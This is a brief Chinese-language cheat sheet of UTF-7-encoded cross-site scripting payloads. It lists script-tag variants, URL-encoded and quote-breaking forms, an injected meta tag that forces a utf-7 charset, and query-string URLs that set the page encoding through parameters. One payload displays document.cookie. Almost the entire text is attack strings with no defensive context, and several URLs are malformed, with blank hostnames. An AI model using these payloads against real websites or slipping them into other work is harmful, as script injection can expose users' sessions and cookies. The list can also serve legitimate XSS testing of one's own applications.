1、基本样式
+ADw-script+AD4-alert(31337)+ADw-/script+AD4-
+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
2、URL encoded 转换后的样式
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
3、利用引号’和”
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
"><"
4、URL编码,利用引号’和”
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
"><"
5、注入伪造的
+ADw-/title+AD4APA-meta. http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
6、利用UTF-7 iframe
7、charset通过参数设定的
http://www.badguest.cn /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
http://www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=CP932
http://www./?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&eo=MS932
http://www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&cs=jis
http://www./?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&charset=utf8
http://www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&enc=sjis
作者:独自等待